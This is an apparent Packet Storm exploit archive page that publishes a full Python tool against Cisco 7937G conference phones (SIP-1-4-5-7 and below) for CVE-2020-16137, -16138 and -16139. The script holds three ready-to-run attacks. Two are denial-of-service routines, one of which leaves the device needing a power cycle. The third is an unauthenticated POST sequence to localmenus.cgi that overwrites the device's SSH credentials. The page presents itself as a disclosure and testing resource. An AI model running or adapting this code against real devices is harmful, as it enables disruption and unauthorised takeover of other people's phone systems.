exploit the possibilities

Cisco 7937G All-In-One Exploiter

Cisco 7937G All-In-One Exploiter
Posted Aug 10, 2020
Authored by Cody Martin

This exploit is an all-in-one tool that leverages vulnerabilities described in CVE-2020-16139, CVE-2020-16138, and CVE-2020-16137 against Cisco 7937G devices versions SIP-1-4-5-7 and below.

tags | exploit, vulnerability
systems | cisco
advisories | CVE-2020-16137, CVE-2020-16138, CVE-2020-16139
MD5 | 9eb60ef20d0f3abf883446a0c58b2d27

Cisco 7937G All-In-One Exploiter

Change Mirror Download
# Exploit Title: Cisco 7937G All-In-One Exploiter
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
# CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137
#!/usr/bin/python

import sys
import getopt
import requests
import paramiko
import socket
import os


def main(argv):
target = ""
attack = ""
username = ""
password = ""
divider = "============================================="

help_text = '''
exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password]
%s
Example: exploit.py -t 192.168.1.200 -a 1
Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa
%s
Attack types:
1: DoS with automatic device reset
2: DoS without automatic device reset
3: Change SSH credentials of target device
''' % (divider, divider)

if len(sys.argv) == 1:
print(help_text)
sys.exit(2)
try:
opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="])
except getopt.GetoptError:
print(help_text)
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print(help_text)
sys.exit()
elif opt in ("-t", "--target"):
target = arg
elif opt in ("-a", "--attack"):
attack = arg
elif opt in ("-u", "--user"):
username = arg
elif opt in ("-p", "--password"):
password = arg

if username != "" and password != "" and attack == "3":
print("Starting SSH attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password)
finished = attack_ssh(target, username, password)
elif attack == "1":
print("Starting DoS reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_one(target)
elif attack == "2":
print("Starting DoS non-reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_two(target)

print(divider)

if finished == 1:
print("DoS reset attack completed!")
elif finished == 2:
print("DoS non-reset attack completed!")
print("Device must be power cycled to restore functionality.")
elif finished == 3:
tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password)
connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target)
print(tell)
print("You must specify the key exchange when connecting or the device will be DoS'd!")
print(connection_example)
elif finished == 0:
print("Something strange happened. Attack likely unsuccessful.")
sys.exit()


def dos_one(target):
url = "http://%s/localmenus.cgi" % target
data = "A"*46
payload = {"func": "609", "data": data, "rphl": "1"}
print("FIRING ZE MIZZLES!")
for i in range(1000):
try:
r = requests.post(url=url, params=payload, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
except requests.exceptions.RequestException:
return 1

return 0


def dos_two(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
try:
sock.connect((target, 22))
except OSError:
print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.")
sys.exit()

transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1",
"diffie-hellman-group14-sha1",
"diffie-hellman-group1-sha1"]})

fd = os.open("/dev/null", os.O_WRONLY)
savefd = os.dup(2)
os.dup2(fd, 2)

try:
transport.connect(username="notreal", password="notreal")
except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException):
os.dup2(savefd, 2)
return 2

return 0


def attack_ssh(target, username, password):
url = "http://%s/localmenus.cgi" % target
payload_user = {"func": "403", "set": "401", "name1": username, "name2": username}
payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password}
print("FIRING ZE MIZZLES!")
try:
r = requests.post(url=url, params=payload_user, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()

r = requests.post(url=url, params=payload_pass, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()
except requests.exceptions.RequestException:
print("Device doesn't appear to be functioning or web access is not enabled.")
sys.exit()

return 3


if __name__ == "__main__":
main(sys.argv[1:])

Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close